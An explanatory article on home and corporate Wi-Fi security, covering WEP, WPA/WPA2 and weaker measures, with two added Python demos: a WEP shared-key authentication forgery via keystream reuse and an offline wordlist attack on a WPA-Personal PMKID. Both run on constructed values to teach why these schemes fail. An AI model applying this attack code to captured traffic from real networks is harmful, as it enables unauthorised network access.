Wireless Networks: Security
Wireless home networks allow you to use your computer from virtually anywhere in the house, connect to other computers on the network, and access the Internet. Security is a very important aspect of a wireless network, since anyone who can connect to our network could use our services and even read the traffic exchanged between our machine and other hosts or the Internet. If the wireless network is not secured, anyone within radio range can:
- Intercept the data you send or receive
- Access your shared files
- Hijack your Internet connection and use up your bandwidth or your data allowance
Internet Safety Tips to Protect Your Wireless Network
Here are a few
simple steps you can take to protect your wireless network and routers:
WEP with shared key
WEP (Wired Equivalent Privacy) with shared-key authentication is the simplest authentication scheme, but also a very insecure one. The network has a set of up to four keys that every user must know in order to connect. The keys are 40 or 104 bits long and are combined with a 24-bit initialization vector (IV, a per-packet value that is sent in the clear), which gives the advertised 64-bit and 128-bit key sizes respectively.
Connecting a client to a WEP-protected network with shared-key authentication requires the following steps:
1. The client tells the AP that it wants to authenticate.
2. The AP responds by sending the client a challenge in plain text. It should be noted that a challenge is a random string that is used to make sure the other party knows the key, without the key itself ever being sent.
3. The client takes one of the WEP keys it knows for the network, encrypts the challenge with it (RC4 keyed with a fresh IV followed by the key), and sends the result back to the AP together with the IV.
4. The AP checks the encrypted text it received; if it matches what it calculates itself (encrypting the same challenge with the same key and IV), it authenticates the client.
The weakness is already visible in this exchange: an eavesdropper sees both the plaintext challenge and its encryption, so the XOR of the two yields the RC4 keystream for that IV, and that keystream is enough to answer a later challenge with the same IV without ever knowing the key. For this reason shared-key authentication is in practice weaker than WEP's open authentication.
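The four steps above, with both the AP and the client side implemented, followed by what an eavesdropper can do with the pair of messages it overhears. This is an added example written for this page, not code from the original post: it uses a textbook RC4 and the WEP CRC-32 integrity check value, and the 13-byte key, station names and IVs are constructed values, not those of any real network.

```python
"""WEP shared-key authentication modelled end to end (added example).

Both parties of the four-step exchange are implemented, along with the
keystream-recovery trick available to anyone who overhears the exchange.
"""
import secrets
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA) XORed over data; encrypts and decrypts alike."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(body: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(body).to_bytes(4, "little")


def wep_seal(wep_key: bytes, iv: bytes, body: bytes) -> bytes:
    """WEP seeds RC4 with IV || key; the 24-bit IV itself travels in clear."""
    return rc4(iv + wep_key, body + icv(body))


def wep_open(wep_key: bytes, iv: bytes, ciphertext: bytes):
    """Decrypt and verify the ICV; returns the body, or None if the check fails."""
    data = rc4(iv + wep_key, ciphertext)
    body, tag = data[:-4], data[-4:]
    return body if icv(body) == tag else None


class AccessPoint:
    """The AP side of shared-key authentication."""

    def __init__(self, wep_key: bytes):
        self.wep_key = wep_key
        self.pending = {}                     # station -> outstanding challenge

    def auth_request(self, station: str) -> bytes:
        """Steps 1-2: answer an authentication request with a 128-byte plaintext challenge."""
        challenge = secrets.token_bytes(128)
        self.pending[station] = challenge
        return challenge

    def auth_response(self, station: str, iv: bytes, ciphertext: bytes) -> bool:
        """Step 4: decrypt the reply and accept only if it is the challenge we issued."""
        challenge = self.pending.pop(station, None)
        if challenge is None:
            return False
        return wep_open(self.wep_key, iv, ciphertext) == challenge


def client_answer(wep_key: bytes, challenge: bytes, iv: bytes = None):
    """Step 3: the client encrypts the challenge under one of its WEP keys."""
    iv = iv if iv is not None else secrets.token_bytes(3)
    return iv, wep_seal(wep_key, iv, challenge)


def keystream_from_exchange(challenge: bytes, ciphertext: bytes) -> bytes:
    """Eavesdropper: challenge and its ICV are known plaintext, so XOR with the
    ciphertext gives the RC4 keystream for that IV (132 bytes)."""
    known = challenge + icv(challenge)
    return bytes(a ^ b for a, b in zip(known, ciphertext))


def forged_authentication(ap: AccessPoint, keystream: bytes, iv: bytes) -> bool:
    """Attacker with no key: answer a fresh challenge by reusing the captured IV and keystream."""
    challenge = ap.auth_request("sta-evil")
    known = challenge + icv(challenge)
    forged = bytes(a ^ b for a, b in zip(known, keystream))
    return ap.auth_response("sta-evil", iv, forged)


def demo(wep_key: bytes):
    """One legitimate authentication, then a forged one built only from what was overheard."""
    ap = AccessPoint(wep_key)
    challenge = ap.auth_request("sta-A")
    iv, ct = client_answer(wep_key, challenge)
    legit_ok = ap.auth_response("sta-A", iv, ct)
    keystream = keystream_from_exchange(challenge, ct)
    forged_ok = forged_authentication(ap, keystream, iv)
    return legit_ok, forged_ok


if __name__ == "__main__":
    # Constructed 104-bit (13-byte) WEP key; not a real network key.
    print(demo(bytes.fromhex("0102030405060708090a0b0c0d")))   # (True, True)
```

Both values come back True: the AP cannot tell the forged reply from a genuine one, because RC4 keyed with the same IV and key always produces the same keystream, and the client, not the AP, chooses the IV.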
Authentication and encryption
WEP provides only a weak form of authentication, and although it does encrypt traffic with RC4, the scheme is broken: the 24-bit IV repeats quickly on a busy network and weaknesses in how RC4 is keyed allow the WEP key to be recovered from captured traffic in minutes. There are, then, other stronger methods that authenticate the client and also encrypt the exchanged packets properly. We can mention two technologies in this section: WPA and WPA2.
WPA and WPA2
WPA (Wi-Fi Protected Access) is an important improvement over WEP: it derives fresh per-session keys instead of encrypting everything with one static key, and it replaces plain WEP encryption with TKIP (Temporal Key Integrity Protocol), which adds per-packet key mixing, a 48-bit sequence counter and a message integrity check. TKIP, however, still uses RC4 underneath, because it was designed to run on existing WEP hardware, so although the problems are reduced it still inherits some of WEP's weaknesses and is itself now deprecated. WPA can also use AES (in CCMP mode), a much stronger cipher, but AES needed hardware support that older cards lacked, which is why it is optional with WPA. WPA2 makes AES-CCMP mandatory; TKIP survives in WPA2 only as an optional compatibility mode for legacy clients and should be disabled wherever possible.
WPA and WPA2 can use two authentication modes. They are:
- Enterprise: each user is authenticated individually (802.1X) against a RADIUS server, and every session gets its own keys.
- Personal: it uses a pre-shared key (PSK) derived from a passphrase that all clients share. It gives less security, because the secret is the same for everyone and a weak passphrase can be guessed offline from captured traffic, but it is easier to configure and is usually used for a small network or a home.
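Personal mode is only as strong as its passphrase, and the following added example shows why. It is not code from the original post: it implements the 802.11i derivation of the 256-bit PSK (PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID, 4096 iterations) and the PMKID that many access points announce in clear in the first message of the key handshake (HMAC-SHA1 over "PMK Name", the AP MAC and the client MAC, truncated to 128 bits). Everything keyed with the PSK can be checked against a wordlist offline, with no further contact with the network. The SSID "HomeNet", the MAC addresses, the wordlist and the two passphrases are constructed for the example.

```python
"""WPA/WPA2-Personal: the passphrase is the whole secret (added example)."""
import hashlib
import hmac


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i PSK (used directly as the PMK):
    PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA); AA is the AP's
    MAC, SPA the station's. Sent in clear by many APs in EAPOL message 1."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def offline_guess(captured_pmkid: bytes, ssid: str, ap_mac: bytes,
                  sta_mac: bytes, wordlist):
    """Try every candidate passphrase against the captured value.
    Nothing here talks to the network: the check is entirely offline."""
    for candidate in wordlist:
        if pmkid(wpa_psk(candidate, ssid), ap_mac, sta_mac) == captured_pmkid:
            return candidate
    return None


# Constructed scenario: hypothetical SSID, MAC addresses and wordlist.
SSID = "HomeNet"
AP_MAC = bytes.fromhex("02a1b2c3d4e5")
STA_MAC = bytes.fromhex("02f6e5d4c3b2")
WORDLIST = ["12345678", "password", "letmein1", "HomeNet2019", "qwerty123"]


def demo():
    """A weak passphrase falls to a five-word list; a random one does not."""
    # What an attacker would capture if the owner chose a predictable passphrase.
    captured_weak = pmkid(wpa_psk("HomeNet2019", SSID), AP_MAC, STA_MAC)
    weak = offline_guess(captured_weak, SSID, AP_MAC, STA_MAC, WORDLIST)
    # The same capture for a long random passphrase matches nothing in the list.
    captured_strong = pmkid(wpa_psk("k7#Vp2!qLx9@Rm4zTw8", SSID), AP_MAC, STA_MAC)
    strong = offline_guess(captured_strong, SSID, AP_MAC, STA_MAC, WORDLIST)
    return weak, strong


if __name__ == "__main__":
    print(demo())   # ('HomeNet2019', None)
```

The 4096 PBKDF2 iterations slow each guess down but do not change the picture: whoever captures one handshake (or PMKID) can test passphrases at leisure, so a long random passphrase is the only real protection in Personal mode. Enterprise mode avoids the problem altogether, since no shared passphrase exists to guess.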
Other security considerations
There are several more actions that can be taken to protect a network. The most common are:
- MAC filtering: a list is made of the MAC addresses of the devices that are allowed to connect to the network, and the AP rejects any device whose MAC is not on the list.
- Hide the SSID: as we have seen, the SSID is the name of the network. By hiding it, the network, although present, is not listed among the networks available to connect to, so a client that wants to join it must supply the SSID explicitly.
- Disable DHCP: with DHCP disabled, a client that has managed to associate must still find out the subnet and addressing in use before it can reach any service.
It is worth clarifying that these methods add only weak layers of security: they stop a user without much knowledge but are useless against someone who spends a few hours reading on the subject, since a MAC address can be changed at will, a hidden SSID appears in the traffic of legitimate clients, and the addressing in use can be learned by listening to that same traffic.
A security measure that is independent of all the above concerns the type of service to be provided on the wireless network and what access its clients should have to the wired network. Suppose a company has a corporate network on which various services are provided, such as shared files. If the information is sensitive, it is highly recommended that it be accessible only through the wired network and not through the wireless one.
A different subnet is then normally defined for the wired and the wireless networks, with different services on each. Usually a firewall is placed in front of the wireless network that allows, for example, only web traffic. In this way Internet access can be provided to mobile devices, but if they need to reach the corporate network they must connect with a cable. These measures are highly recommended because even if, despite all the security implemented, someone manages to associate with the wireless network, they will still not be able to reach the company's services.